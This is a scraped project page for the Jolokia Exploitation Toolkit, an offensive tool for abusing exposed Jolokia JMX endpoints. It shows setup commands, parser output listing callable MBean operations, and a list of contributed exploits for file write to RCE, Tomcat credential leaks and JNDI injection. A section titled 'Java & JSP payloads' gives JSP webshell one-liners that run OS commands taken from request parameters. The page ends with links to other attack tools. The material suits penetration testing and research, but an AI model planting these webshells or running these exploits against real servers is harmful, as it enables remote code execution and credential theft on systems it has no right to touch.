Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

Overview

jolokia-exploitation-toolkit

Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

jolokia

Core concept

Jolokia is a protocol bridge that enables users to interact with MBeans (JMB) through HTTP. This endpoint "exposed JMX features" which are often dangerous, this implies that /jolokia should never be exposed, and if used internally (loopback), should be protected by an authentication mechanism.

Doc says... :)

Jolokia is a JMX-HTTP bridge giving an alternative to JSR-160 connectors. It is an agent based approach with support for many platforms. In addition to basic JMX operations it enhances JMX remoting with unique features like bulk requests and fine grained security policies.

Where to find jolokia

  1. Java projects
  2. /jolokia
  3. /actuator/jolokia
  4. ???

Test setup

You can either startup a tomcat server (docker || docker-compose) and install the jolokia war,
Or run docker run --rm -it --net=host bodsch/docker-jolokia and go with the flow ~

Setup & Usage

# Setup with virtualenv
virtualenv -p python3 .venv && source .venv/bin/activate
pip install -r requirements.txt

# Use jolokia-parser.py with remote url
python jolokia-parser.py http://127.0.0.1/jolokia | tee jolokia-parsed.lst
# Use jolokia-parser.py with local json
curl http://127.0.0.1/jolokia/list -o jolokia-list.json
python jolokia-parser.py jolokia-list.json | sed 's#^/jolokia#http://127.0.0.1/jolokia#g' | tee jolokia-parsed.lst

The expected output in jolokia-parsed.lst is the following:

http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor
[+] CLASS : javax.management.MBeanServerDelegate
[+] DESC  : Represents  the MBean server from the management point of view.
[+] DESC  : getRecordingOptions // returns javax.management.openmbean.TabularData
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/getRecordingOptions/$long
[+] DESC  : takeSnapshot // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/takeSnapshot
[+] DESC  : closeRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/closeRecording/$long
[+] DESC  : newRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/newRecording
[+] DESC  : setRecordingSettings // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingSettings/$long/$javax.management.openmbean.TabularData
[+] DESC  : openStream // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/openStream/$long/$javax.management.openmbean.TabularData
[+] DESC  : cloneRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/cloneRecording/$long/$boolean
[+] DESC  : setRecordingOptions // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingOptions/$long/$javax.management.openmbean.TabularData
[+] DESC  : copyTo // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/copyTo/$long/$java.lang.String
[+] DESC  : startRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/startRecording/$long
[...]

Java & JSP payloads

<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%> <%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %> ">
<% Runtime.getRuntime().exec(new String[] { "sh", "-c", "cmd" }); %>
<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%>
<%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %>

Contributors & Content

  • @TheLaluka
    • jolokia-parser.py | Convert /jolokia/list or json blob to human-readable urls
    • exploits/file-write-to-rce-vhost-jfr.md | File read and file write to RCE by deploying a vhost with MBeanFactory/createStandardHost and DiagnosticCommand/jfrStart
    • exploits/file-read-compilerdirectivesadd.md | File read with DiagnosticCommand/compilerDirectivesAdd
    • exploits/file-write-to-rce-vmLog.md | File write to RCE with DiagnosticCommand/vmLog
  • @Coiffeur0x90
    • exploits/file-write-to-rce-valve.py | File write with Catalina:host=localhost,name=AccessLogValve (exploit)
    • exploits/file-write-to-rce-valve.md | File write with Catalina:host=localhost,name=AccessLogValve (article)
    • exploits/info-leak-tomcat-creds.py | Tomcat credentials leak with Users:database=UserDatabase,type=UserDatabase
  • @mpgn_x64
    • exploits/jndi-logback.md | XXE to RCE with ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL
  • RicterZ
    • exploits/jndi-injection-MBeanFactory.py | RCE with JNDI Injection (Tomcat EL) with MBeanFactory
  • @lely__
    • exploits/jndi-ldap-target.md | RMI injection with java.lang:type=Memory
  • You should be here? Let me know and I'll fix that!

Sources & References

You might also like...
neo Tool is great one in binary exploitation topic
neo Tool is great one in binary exploitation topic

neo Tool is great one in binary exploitation topic. instead of doing several missions by many tools and windows, you can now automate this in one tool in one session.. Enjoy it

Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, downloads, history, and more.
Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, downloads, history, and more.

ChromePE [Linux/Windows] Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, download

A collection of intelligence about Log4Shell and its exploitation activity

Log4Shell-IOCs Members of the Curated Intelligence Trust Group have compiled a list of IOC feeds and threat reports focused on the recent Log4Shell ex

Password Manager is a simple Python project which helps users in managing their passwords in a easier way

Password Manager is a simple Python project which helps users in managing their passwords in a easier way

evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files.
evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files.

Introduction evtx-hunter helps to quickly spot interesting security-related activity in Windows Event Viewer (EVTX) files. It can process a high numbe

PasswordManager is a command-line program that helps you manage your secret files like passwords

PasswordManager is a command-line program that helps you manage your secret files like passwords. It's very minimalistic and easy to use.

Driver Buddy Reloaded is an IDA Pro Python plugin that helps automate some tedious Windows Kernel Drivers reverse engineering tasks.
Driver Buddy Reloaded is an IDA Pro Python plugin that helps automate some tedious Windows Kernel Drivers reverse engineering tasks.

Driver Buddy Reloaded Quickstart Table of Contents Installation Usage About Driver Buddy Reloaded Finding DispatchDeviceControl Labelling WDM & WDF St

Phishing Campaign Toolkit
Phishing Campaign Toolkit

King Phisher Phishing Campaign Toolkit Installation For instructions on how to install, please see the INSTALL.md file. After installing, for instruct

A knockoff social-engineer toolkit
A knockoff social-engineer toolkit

The Python SE Dopp Kit is a social engineering toolkit with many purposes. It contains 5 different modules designed to be of assistance in different s

Owner
Laluka
Black Hat ? Hello no ! Black Cat.
Laluka
Salesforce Recon and Exploitation Toolkit

Salesforce Recon and Exploitation Toolkit Salesforce Recon and Exploitation Toolkit Usage python3 main.py <URL> References Announcement Blog - https:/

null 81 Dec 23, 2022
VPN Overall Reconnaissance, Testing, Enumeration and eXploitation Toolkit

Vortex VPN Overall Reconnaissance, Testing, Enumeration and Exploitation Toolkit Overview A very simple Python framework, inspired by SprayingToolkit,

null 315 Dec 28, 2022
APKLeaks - Scanning APK file for URIs, endpoints & secrets.

APKLeaks - Scanning APK file for URIs, endpoints & secrets.

dw1 3.5k Jan 9, 2023
An open-source post-exploitation framework for students, researchers and developers.

Questions? Join the Discord support server Disclaimer: This project should be used for authorized testing or educational purposes only. BYOB is an ope

dvm 8.1k Dec 31, 2022
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Pupy Installation Installation instructions are on the wiki, in addition to all other documentation. For maximum compatibility, it is recommended to u

null 7.4k Jan 4, 2023
Crowbar - A windows post exploitation tool

Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script

null 29 Nov 20, 2022
CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

CamOver is a camera exploitation tool that allows to disclosure network camera admin password. Features Exploits vulnerabilities in most popul

EntySec 247 Jan 2, 2023
SSRF search vulnerabilities exploitation extended.

This tool search for SSRF using predefined settings in different parts of a request (path, host, headers, post and get parameters).

Andri Wahyudi 13 Jul 4, 2021
A windows post exploitation tool that contains a lot of features for information gathering and more.

Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script

null 29 Nov 20, 2022
Vulnerability Exploitation Code Collection Repository

Introduction expbox is an exploit code collection repository List CVE-2021-41349 Exchange XSS PoC <= Exchange 2013 update 23 <= Exchange 2016 update 2

0x0021h 263 Feb 14, 2022